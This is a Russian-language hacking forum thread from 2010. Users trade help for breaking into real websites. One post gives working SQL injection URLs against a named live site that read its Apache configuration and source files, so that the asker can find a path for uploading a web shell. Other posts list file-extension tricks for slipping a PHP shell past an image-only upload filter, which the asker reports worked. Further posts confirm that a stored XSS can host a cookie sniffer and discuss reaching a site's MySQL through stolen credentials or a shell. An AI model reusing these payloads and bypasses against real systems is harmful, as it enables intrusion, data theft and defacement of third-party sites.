05.03.2010, 23:27
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Pashkela
просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\
LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r
ServerName mission.am
DocumentRoot htdocs/mission
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
|
|
|
06.03.2010, 07:30
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
Сообщение от Jokester
Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\
LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
net ne za defeysom sprasu..
prosto ne moqu nayti path shtobi shell zalivat ??
a dalse kto pomojet ??
|
|
|
|
06.03.2010, 10:09
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от LokbatanLi
net ne za defeysom sprasu..
prosto ne moqu nayti path shtobi shell zalivat ??
a dalse kto pomojet ??
Тебе ж дали путь.
На всякий случай почитай http://forum.antichat.ru/thread104591.html
|
|
|
|
06.03.2010, 12:21
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
Помогтье загрузить шелл!Грузятся только изображния!остальное просто режется.
файл типа shell.php режется к виду [какое либо число] без расширения
т.е. shell.php будет подимене 8 без расширения
shell.php.php
shell.php%00.jpg
.htaccess не катят
|
|
|
|
06.03.2010, 12:24
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
shell.php3
shell.phtml
shell.php3.php
shell.phtml.php
shell.pHp
shell.PHTmL
|
|
|
|
06.03.2010, 12:35
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
wildshaman спс за ответ! какойто из способов помог!! оказалось зря шелл грузил и парился ((( очень суровые там условия!
|
|
|
|
06.03.2010, 13:13
|
|
Участник форума
Регистрация: 13.01.2008
Сообщений: 125
С нами:
9645786
Репутация:
0
|
|
если я в каком либо чате нашёл XSS которая реагирует когда выполняется код (ппросмотр чата)
то могу ли я туда сниффер поставить ?
|
|
|
|
06.03.2010, 13:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Tapaceuka
если я в каком либо чате нашёл XSS которая реагирует когда выполняется код (ппросмотр чата)
то могу ли я туда сниффер поставить ?
Да. Это называется активная XSS.
|
|
|
|
06.03.2010, 18:45
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
есть пароль и логин о мускуля сайта. можно ли подключиться к нему? какой клиент посоветуете?
phpmyadmin на сайте нет, через веб-интерфейс никак...
|
|
|
|
06.03.2010, 19:22
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
С нами:
8981650
Репутация:
80
|
|
есть пароль и логин о мускуля сайта. можно ли подключиться к нему? какой клиент посоветуете?
phpmyadmin на сайте нет, через веб-интерфейс никак...
Всё зависит от пользователя MySQL. Если имя <имя>@localhost, то это значит, что удаленно подключится никак нельзя, лишь с локальной машины (если не ошибаюсь, то root@localhost - исключение. К нему можно подключаться удаленно). В таком случае можно только через шелл на сайте.
Есть много хороших статей. Гугли "удаленное подключение MySQL". Самая первая неплохая.
Последний раз редактировалось Sams; 06.03.2010 в 19:25..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
